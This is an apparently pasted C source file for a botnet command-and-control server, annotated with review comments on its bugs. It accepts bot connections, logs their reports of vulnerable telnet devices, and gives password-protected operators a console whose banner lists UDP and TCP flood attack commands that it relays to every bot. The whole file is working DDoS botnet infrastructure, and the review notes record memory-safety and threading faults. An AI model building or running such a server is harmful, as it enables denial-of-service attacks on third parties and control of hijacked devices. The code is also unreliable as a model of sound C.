
Untitled

a guest
Jul 22nd, 2016
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <sys/types.h>
  5. #include <sys/socket.h>
  6. #include <netdb.h>
  7. #include <unistd.h>
  8. #include <time.h>
  9. #include <fcntl.h>
  10. #include <sys/epoll.h>
  11. #include <errno.h>
  12. #include <pthread.h>
  13. #include <signal.h>
  14.  
  ////////////////////////////////////
  /* TCP port that telnetListener() binds for operator ("management") logins. */
  #define MY_MGM_PORT 7362
  /*
   * Size of the clients[] and managements[] tables and of the epoll event
   * array. Both tables are indexed directly by socket descriptor.
   * NOTE(review): no descriptor is compared against MAXFDS before being used
   * as an index anywhere in this listing.
   */
  #define MAXFDS 1000000 //max amount of bots, near impossible to reach this amount.
  ////////////////////////////////////
  19.  
  20.  
  /* One operator credential pair, filled from login.txt by telnetWorker(). */
  struct account {
      char id[20];       // login name, fixed 20-byte field
      char password[20]; // kept and compared as plaintext (strcmp in telnetWorker)
  };
  /* Fixed table of 10 credentials; telnetWorker() reloads it on every connection. */
  static struct account accounts[10];

  /* Per-descriptor state for bot connections; the array index is the socket fd. */
  struct clientdata_t {
      uint32_t ip;    // never assigned in this listing
      char build[7];  // never assigned in this listing
      char connected; // 1 while the descriptor is treated as a live bot, else 0
  } clients[MAXFDS];

  /* Per-descriptor state for operator sessions; also indexed by socket fd. */
  struct telnetdata_t {
      int connected; // set to 1 after a successful login, cleared when the session ends
  } managements[MAXFDS];
  36.  
  37.  
  38.  
  39. ////////////////////////////////////
  40.  
  41.  
  /*
   * Process-wide state shared by the epoll workers, the management threads and
   * main(). NOTE(review): `volatile` does not make the ++/-- updates on these
   * counters atomic, and nothing in this listing serialises access to them.
   */
  static volatile FILE *telFD;              // telnet.txt, opened "a+" in main(); receives REPORT lines
  static volatile FILE *fileFD;             // not referenced anywhere else in this listing
  static volatile int epollFD = 0;          // epoll instance created in main()
  static volatile int listenFD = 0;         // listening socket for bot connections
  static volatile int managesConnected = 0; // number of open management sessions
  static volatile int TELFound = 0;         // number of REPORT lines received
  static volatile int scannerreport;        // set to 1 on "SCANNER STARTED!", decremented on "SCANNER STOPPED!"
  49.  
  50.  
  51. ////////////////////////////////////
  52.  
  53.  
  /*
   * Read from fd one byte at a time into buffer until a '\n' has been stored,
   * bufferSize bytes have been stored, or read() returns something other than 1.
   *
   * Returns the result of the last read() call (1, 0 or -1), not a byte count.
   * No NUL terminator is written; the callers rely on having zeroed the buffer.
   *
   * NOTE(review): on the first pass total is 0, so the loop condition inspects
   * buffer[-1], one byte before the caller's buffer. total is also advanced
   * when read() fails, and a line of bufferSize bytes with no newline fills the
   * buffer completely, leaving no terminator for the strstr()/trim() calls the
   * callers make next.
   */
  int fdgets(unsigned char *buffer, int bufferSize, int fd)
  {
      int total = 0, got = 1;
      while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
      return got;
  }
  /*
   * Strip leading and trailing whitespace from str in place.
   * The kept characters are moved to the front of the buffer and the string
   * is re-terminated; an empty or all-whitespace string becomes "".
   */
  void trim(char *str)
  {
      int first = 0;
      int last = strlen(str) - 1;
      int kept;

      /* Skip leading whitespace; the terminating NUL stops the scan. */
      while (isspace(str[first]))
          first++;

      /* Walk back over trailing whitespace, never crossing `first`. */
      while ((last >= first) && isspace(str[last]))
          last--;

      /* Number of characters that survive; 0 when nothing is left. */
      kept = last - first + 1;
      if (kept > 0)
          memmove(str, str + first, (size_t)kept);
      str[kept] = '\0';
  }
  70.  
  71.  
  /*
   * Add O_NONBLOCK to the file status flags of sfd.
   * Returns 0 on success; on an fcntl() failure prints the error with
   * perror("fcntl") and returns -1.
   */
  static int make_socket_non_blocking (int sfd)
  {
      int current = fcntl(sfd, F_GETFL, 0);

      if (current == -1) {
          perror("fcntl");
          return -1;
      }

      /* Keep the existing flags and only add the non-blocking bit. */
      if (fcntl(sfd, F_SETFL, current | O_NONBLOCK) == -1) {
          perror("fcntl");
          return -1;
      }

      return 0;
  }
  90.  
  91.  
  /*
   * Resolve a passive (wildcard) stream address for `port` and return a socket
   * bound to the first candidate that binds, or -1 on failure. The socket is
   * not put into the listening state here; main() calls listen() on it.
   *
   * NOTE(review): the addrinfo list is not freed on the "Could not bind" path,
   * and a setsockopt() failure is reported but not treated as fatal.
   */
  static int create_and_bind (char *port)
  {
      struct addrinfo hints;
      struct addrinfo *result, *rp;
      int s, sfd;
      memset (&hints, 0, sizeof (struct addrinfo));
      hints.ai_family = AF_UNSPEC;     // IPv4 or IPv6, whichever getaddrinfo offers
      hints.ai_socktype = SOCK_STREAM; // TCP
      hints.ai_flags = AI_PASSIVE;     // with a NULL node this yields a wildcard address
      s = getaddrinfo (NULL, port, &hints, &result);
      if (s != 0)
      {
          fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s));
          return -1;
      }
      // Try each candidate address in turn and keep the first one that binds.
      for (rp = result; rp != NULL; rp = rp->ai_next)
      {
          sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol);
          if (sfd == -1) continue;
          int yes = 1;
          if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt");
          s = bind (sfd, rp->ai_addr, rp->ai_addrlen);
          if (s == 0)
          {
              break;
          }
          close (sfd);
      }
      // rp is NULL only when the loop ran out of candidates without a bind.
      if (rp == NULL)
      {
          fprintf (stderr, "Could not bind\n");
          return -1;
      }
      freeaddrinfo (result);
      return sfd;
  }
  /*
   * Relay msg to every descriptor marked connected in clients[] and, unless
   * msg is exactly "PING", to every descriptor marked in managements[].
   * `us` is the sender's descriptor and is skipped (main() passes -1).
   *
   * Management sessions get a green timestamp prefix and a fresh prompt; bot
   * connections get the raw message followed by '\n'. Each delivery is also
   * printed to stdout as "sent to fd: N".
   *
   * NOTE(review): `wot` is allocated (unchecked), trimmed and freed but never
   * sent; the untrimmed msg goes on the wire. localtime()/asctime() return
   * shared static storage, which trim() then edits in place, and this function
   * is called from main() and from the management threads. Every call walks
   * all MAXFDS slots and no send() result is checked.
   */
  void broadcast(char *msg, int us)
  {
      int sendMGM = 1;
      if(strcmp(msg, "PING") == 0) sendMGM = 0; // keepalives are not echoed to operators
      char *wot = malloc(strlen(msg) + 10);
      memset(wot, 0, strlen(msg) + 10);
      strcpy(wot, msg);
      trim(wot);
      time_t rawtime;
      struct tm * timeinfo;
      time(&rawtime);
      timeinfo = localtime(&rawtime);
      char *timestamp = asctime(timeinfo);
      trim(timestamp); // drops the trailing newline asctime() appends
      int i;
      for(i = 0; i < MAXFDS; i++)
      {
          // Skip the sender, and any slot that is neither a bot nor an eligible management session.
          if(i == us || (!clients[i].connected && (sendMGM == 0 || !managements[i].connected))) continue;
          if(sendMGM && managements[i].connected)
          {
              send(i, "\x1b[32m", 5, MSG_NOSIGNAL);
              send(i, timestamp, strlen(timestamp), MSG_NOSIGNAL);
              send(i, ": ", 2, MSG_NOSIGNAL);
          }
          printf("sent to fd: %d\n", i);
          send(i, msg, strlen(msg), MSG_NOSIGNAL);
          if(sendMGM && managements[i].connected) send(i, "\r\n\x1b[32m> \x1b[0m", 13, MSG_NOSIGNAL);
          else send(i, "\n", 1, MSG_NOSIGNAL);
      }
      free(wot);
  }
  159.  
  /*
   * Thread body that services the bot-facing listener and every accepted bot
   * connection through the shared epoll instance. main() starts several of
   * these threads on the same epollFD. The loop never exits.
   *
   * Wire protocol visible here (newline-terminated text lines):
   *   server -> bot : "!* SCANNER OFF" immediately after accept, "PONG" in reply to "PING"
   *   bot -> server : "PING", "PONG", "REPORT <text>", "SCANNER STARTED!", "SCANNER STOPPED!"
   * "REPORT " payloads are appended unmodified to telFD (telnet.txt); any
   * other line is printed to stdout as buf: "...".
   *
   * NOTE(review): calloc() is unchecked; descriptors index clients[] with no
   * bound check; TELFound and scannerreport are updated without locking; the
   * peer address is received into a generic struct sockaddr and never used;
   * ipIndex and the `line` locals in the SCANNER branches are unused.
   */
  void *epollEventLoop(void *useless)
  {
      struct epoll_event event;
      struct epoll_event *events;
      int s;
      events = calloc (MAXFDS, sizeof event);
      while (1)
      {
          int n, i;
          n = epoll_wait (epollFD, events, MAXFDS, -1); // block until at least one descriptor is ready
          for (i = 0; i < n; i++)
          {
              // Error, hang-up, or an event without readable data: drop the connection.
              if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN)))
              {
                  clients[events[i].data.fd].connected = 0;
                  close(events[i].data.fd);
                  continue;
              }
              else if (listenFD == events[i].data.fd)
              {
                  // Listener is edge-triggered, so accept until the queue is drained (EAGAIN).
                  while (1)
                  {
                      struct sockaddr in_addr;
                      socklen_t in_len;
                      int infd, ipIndex;

                      in_len = sizeof in_addr;
                      infd = accept (listenFD, &in_addr, &in_len);
                      if (infd == -1)
                      {
                          if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break;
                          else
                          {
                              perror ("accept");
                              break;
                          }
                      }

                      s = make_socket_non_blocking (infd);
                      if (s == -1) { close(infd); break; }

                      event.data.fd = infd;
                      event.events = EPOLLIN | EPOLLET;
                      s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event);
                      if (s == -1)
                      {
                          perror ("epoll_ctl");
                          close(infd);
                          break;
                      }

                      // The new descriptor is counted as a bot straight away; no handshake or authentication precedes this.
                      clients[infd].connected = 1;
                      send(infd, "!* SCANNER OFF\n", 15, MSG_NOSIGNAL);
                  }
                  continue;
              }
              else
              {
                  // Readable data on an already-accepted bot connection.
                  int thefd = events[i].data.fd;
                  struct clientdata_t *client = &(clients[thefd]);
                  int done = 0;
                  client->connected = 1;
                  while (1)
                  {
                      ssize_t count;
                      char buf[2048];
                      memset(buf, 0, sizeof buf);

                      // memset() returns buf (non-NULL), so it only re-zeroes the buffer before each line read.
                      while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, thefd)) > 0)
                      {
                          if(strstr(buf, "\n") == NULL) { done = 1; break; } // no newline in a full read: close the connection
                          trim(buf);
                          if(strcmp(buf, "PING") == 0) // basic IRC-like ping/pong challenge/response to see if server is alive
                          {
                              if(send(thefd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // response
                              continue;
                          }
                          if(strstr(buf, "REPORT ") == buf) // received a report of a vulnerable system from a scan
                          {
                              char *line = strstr(buf, "REPORT ") + 7;
                              fprintf(telFD, "%s\n", line); // let's write it out to disk without checking what it is!
                              fflush(telFD);
                              TELFound++;
                              continue;
                          }
                          if(strstr(buf, "SCANNER STARTED!") == buf)
                          {
                              char *line = strstr(buf, "SCANNER STARTED!");
                              scannerreport = 1;
                              continue;
                          }
                          if(strstr(buf, "SCANNER STOPPED!") == buf)
                          {
                              char *line = strstr(buf, "SCANNER STOPPED!");
                              scannerreport--;
                              continue;
                          }
                          if(strcmp(buf, "PONG") == 0)
                          {
                              continue;
                          }

                          // Anything unrecognised is only echoed to the server's stdout.
                          printf("buf: \"%s\"\n", buf);
                      }

                      if (count == -1)
                      {
                          // EAGAIN means the socket is drained for now; any other error ends the connection.
                          if (errno != EAGAIN)
                          {
                              done = 1;
                          }
                          break;
                      }
                      else if (count == 0)
                      {
                          // read() returned 0: the peer closed the connection.
                          done = 1;
                          break;
                      }
                  }

                  if (done)
                  {
                      client->connected = 0;
                      close(thefd);
                  }
              }
          }
      }
  }
  289.  
  /*
   * Count the slots of clients[] whose `connected` flag is non-zero.
   * Scans all MAXFDS entries on every call.
   */
  unsigned int clientsConnected()
  {
      int live = 0;
      int slot;

      for (slot = 0; slot < MAXFDS; slot++)
      {
          if (clients[slot].connected)
              live++;
      }

      return live;
  }
  301.  
  /*
   * Thread body that rewrites the operator terminal's window title every two
   * seconds with the current bot and management-session counts. `sock` is the
   * management descriptor cast to a pointer. The thread ends when send() fails.
   *
   * NOTE(review): `return;` yields no value from a function declared void *,
   * and telnetWorker() starts this thread twice for the same descriptor.
   */
  void *titleWriter(void *sock)
  {
      int thefd = (int)sock;
      char string[2048];
      while(1)
      {
          memset(string, 0, 2048);
          sprintf(string, "%c]0;Bot's connected: %d | Buyer's connected: %d%c", '\033', clientsConnected(), managesConnected, '\007');
          // ESC ] 0 ; <text> BEL is the xterm "set window title" sequence; the
          // trailing \007 (BEL) terminates that sequence rather than ringing the bell.
          if(send(thefd, string, strlen(string), MSG_NOSIGNAL) == -1) return;

          sleep(2);
      }
  }
  316.  
  /*
   * Scan login.txt for lines that contain `str` as a substring.
   * Returns the 0-based index of the last matching line, 0 when no line
   * matched, or -1 when the file cannot be opened.
   *
   * NOTE(review): 0 means both "no match" and "matched the first line", and
   * strstr() matches anywhere in the line (either column, partial text). The
   * exact comparison is the caller's strcmp() against accounts[find_line].id.
   * Lines longer than 511 characters are read in pieces, each counted as a line.
   */
  int Search_in_File(char *str)
  {
      FILE *fp;
      int line_num = 0;
      int find_result = 0, find_line=0;
      char temp[512];

      if((fp = fopen("login.txt", "r")) == NULL){
          return(-1);
      }
      while(fgets(temp, 512, fp) != NULL){
          if((strstr(temp, str)) != NULL){
              find_result++;
              find_line = line_num; // later matches overwrite earlier ones
          }
          line_num++;
      }
      if(fp)
          fclose(fp);

      if(find_result == 0)return 0;

      return find_line;
  }
  341.  
  /*
   * Thread body for one operator ("management") connection; `sock` carries the
   * accepted descriptor cast to a pointer.
   *
   * Flow as written: reload login.txt into accounts[], prompt for username and
   * password, and on success send the help banner, start titleWriter, mark the
   * descriptor in managements[], then loop reading lines. Every non-empty line
   * is written to stdout and server.log with the account id and passed to
   * broadcast(), which relays it to the connected bot descriptors. Lines that
   * contain "status" or "bots" are answered locally and are still relayed.
   *
   * Host artefacts visible here: login.txt (read), server.log (appended).
   *
   * NOTE(review), all visible in the code below:
   *  - fopen("login.txt") is not checked and fp is never closed, so each
   *    connection leaves one more open FILE.
   *  - The load loop runs once per byte counted in the file rather than once
   *    per line, and fscanf("%s %s") has no field widths, while accounts[]
   *    holds 10 entries of 20-byte fields.
   *  - find_line comes from Search_in_File() and is used as an index without a
   *    range check; that function returns -1 when the file cannot be opened.
   *  - buf is not cleared between the username and password reads.
   *  - The lengths passed to send() are hard-coded; "\033[1A" is 4 characters
   *    but 5 is sent. Other literals also look shorter than their stated
   *    length, but runs of spaces may have been collapsed in this paste;
   *    confirm against the raw file.
   *  - The two `return;` statements in the command loop skip the cleanup at
   *    `end:`, and the function returns no value on any path.
   *  - fopen("server.log") is not checked before fprintf().
   *  - managesConnected is updated from several threads without locking.
   */
  void *telnetWorker(void *sock)
  {
      int thefd = (int)sock;
      int find_line;
      managesConnected++;
      pthread_t title;
      char counter[2048];
      memset(counter, 0, 2048);
      char buf[2048];
      char* nickstring;
      char* username;
      char* password;
      memset(buf, 0, sizeof buf);
      char botnet[2048];
      memset(botnet, 0, 2048);

      FILE *fp;
      int i=0;
      int c;
      fp=fopen("login.txt", "r"); // format: user pass
      // First pass: i ends up as the number of fgetc() calls, i.e. bytes in the file plus one.
      while(!feof(fp))
      {
          c=fgetc(fp);
          ++i;
      }
      int j=0;
      rewind(fp);
      // Second pass: one fscanf() per counted byte, each storing into the next accounts[] slot.
      while(j!=i-1)
      {
          fscanf(fp, "%s %s", accounts[j].id, accounts[j].password);
          ++j;
      }

      if(send(thefd, "\x1b[30mUsername:\x1b[30m ", 22, MSG_NOSIGNAL) == -1) goto end;
      if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
      trim(buf);
      nickstring = ("%s", buf); // comma operator: this is just nickstring = buf
      find_line = Search_in_File(nickstring);
      if(strcmp(nickstring, accounts[find_line].id) == 0){
          if(send(thefd, "\x1b[30mPassword:\x1b[30m ", 22, MSG_NOSIGNAL) == -1) goto end;
          if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
          trim(buf);
          if(strcmp(buf, accounts[find_line].password) != 0) goto failed;
          memset(buf, 0, 2048);
          goto fak;
      }
      // Reached by fall-through on an unknown username, or by goto on a wrong password.
      failed:
      if(send(thefd, "\033[1A", 5, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "\x1b[32m****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "\x1b[32m* INVALID CREDENTIALS *\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "\x1b[32m* GTFO MY NET BITCH :) *\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "\x1b[32m****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
      sleep(5);
      goto end;
      // Successful login: start the title updater and send the operator help banner.
      fak:
      pthread_create(&title, NULL, &titleWriter, sock);
      if(send(thefd, "\x1b[1m\x1b[34m*******************************************\r\n", 54, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "*\x1b[36m @WELCOME CLIENTS ENJOY YOUR STAY@\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "*\x1b[33m-----------------------------------------\x1b[33m*\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "* \x1b[36m @ATTACK COMMANDS@\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "* \x1b[32mudp flood = ! udp ip port time 32 syn\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "* \x1b[31mtcp flood = ! tcp ip port time 32 syn\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "* \x1b[36m @STOP ATTACK COMMANDS@\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "* \x1b[32m! killattk\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "*\x1b[33m-----------------------------------------\x1b[33m*\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "* \x1b[36m @TELNET COMMANDS@\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "* \x1b[32mtype bots to view the number of bots!\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "* \x1b[31mtype status to view the number of \x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "* \x1b[36mtelnet devices found! \x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "*\x1b[33m-----------------------------------------\x1b[33m*\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
      if(send(thefd, "*******************************************\r\n\r\n\x1b[34m| \x1b[34m", 59, MSG_NOSIGNAL) == -1) goto end;
      pthread_create(&title, NULL, &titleWriter, sock); // second titleWriter thread for the same descriptor
      managements[thefd].connected = 1; // from here on broadcast() treats this fd as a management session

      while(fdgets(buf, sizeof buf, thefd) > 0)
      {
          if(strstr(buf, "status"))
          {
              sprintf(botnet, "Telnet devices: %d | Telnet status: %d\r\n", TELFound, scannerreport);
              if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return;
          }
          if(strstr(buf, "bots"))
          {
              // The format has one %d; the extra managesConnected argument is ignored.
              sprintf(botnet, "Bots connected: %d\r\n", clientsConnected(), managesConnected);
              if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return;
          }
          trim(buf);
          if(send(thefd, "\x1b[31m> \x1b[0m", 11, MSG_NOSIGNAL) == -1) goto end;
          if(strlen(buf) == 0) continue;
          // Audit trail: account id plus the raw line, to stdout and to server.log.
          printf("%s: \"%s\"\n",accounts[find_line].id, buf);
          FILE *logFile;
          logFile = fopen("server.log", "a");
          fprintf(logFile, "%s: \"%s\"\n",accounts[find_line].id, buf);
          fclose(logFile);
          broadcast(buf, thefd); // relayed as typed; no validation of the line happens here
          memset(buf, 0, 2048);
      }

      end: // cleanup dead socket
      managements[thefd].connected = 0;
      close(thefd);
      managesConnected--;
  }
  445.  
  /*
   * Thread body that listens on TCP port MY_MGM_PORT on all IPv4 interfaces
   * (INADDR_ANY) and starts one telnetWorker thread per accepted connection.
   * The loop never exits.
   *
   * NOTE(review): socket() and bind() failures are only reported with perror()
   * and execution continues; listen() is unchecked; a failed accept() still
   * spawns a worker with a negative descriptor; clilen is not reset before
   * each accept(); worker threads are neither joined nor detached.
   */
  void *telnetListener(void *useless)
  {
      int sockfd, newsockfd;
      socklen_t clilen;
      struct sockaddr_in serv_addr, cli_addr;
      sockfd = socket(AF_INET, SOCK_STREAM, 0);
      if (sockfd < 0) perror("ERROR opening socket");
      bzero((char *) &serv_addr, sizeof(serv_addr));
      serv_addr.sin_family = AF_INET;
      serv_addr.sin_addr.s_addr = INADDR_ANY;
      serv_addr.sin_port = htons(MY_MGM_PORT);
      if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) perror("ERROR on binding");
      listen(sockfd,5);
      clilen = sizeof(cli_addr);
      while(1)
      {
          newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
          if (newsockfd < 0) perror("ERROR on accept");
          pthread_t thread;
          // The descriptor travels to the worker inside the pointer argument.
          pthread_create( &thread, NULL, &telnetWorker, (void *)newsockfd);
      }
  }
  468.  
  /*
   * Entry point. Usage: <program> [port] [threads].
   *
   * Opens telnet.txt for appending, binds and listens on the bot-facing port
   * given in argv[1], registers the listener with a new epoll instance, starts
   * argv[2] epollEventLoop threads plus one telnetListener thread, and then
   * broadcasts "PING" to the bots every 60 seconds from the main thread.
   *
   * NOTE(review): the third parameter is non-standard and unused; the
   * fopen("telnet.txt") result is unchecked; atoi() gives no error reporting
   * and its result sizes a variable-length array and bounds the thread-start
   * loop without validation; pthread_create() results are ignored; the
   * close()/return after the infinite loop are unreachable.
   */
  int main (int argc, char *argv[], void *sock)
  {
      signal(SIGPIPE, SIG_IGN); // ignore broken pipe errors sent from kernel

      int s, threads;
      struct epoll_event event;

      if (argc != 3)
      {
          fprintf (stderr, "Usage: %s [port] [threads]\n", argv[0]);
          exit (EXIT_FAILURE);
      }
      telFD = fopen("telnet.txt", "a+");
      threads = atoi(argv[2]);

      listenFD = create_and_bind (argv[1]); // try to create a listening socket, die if we can't
      if (listenFD == -1) abort ();

      s = make_socket_non_blocking (listenFD); // try to make it nonblocking, die if we can't
      if (s == -1) abort ();

      s = listen (listenFD, SOMAXCONN); // listen with a huuuuge backlog, die if we can't
      if (s == -1)
      {
          perror ("listen");
          abort ();
      }

      epollFD = epoll_create1 (0); // make an epoll listener, die if we can't
      if (epollFD == -1)
      {
          perror ("epoll_create");
          abort ();
      }

      event.data.fd = listenFD;
      event.events = EPOLLIN | EPOLLET;
      s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event);
      if (s == -1)
      {
          perror ("epoll_ctl");
          abort ();
      }

      pthread_t thread[threads + 2];
      while(threads--)
      {
          pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL); // each thread runs the same shared epoll loop; threads are not per-bot
      }

      pthread_create(&thread[0], NULL, &telnetListener, (void *)NULL);

      while(1)
      {
          broadcast("PING", -1); // ping bots every 60 sec on the main thread
          sleep(60);
      }

      close (listenFD);

      return EXIT_SUCCESS;
  }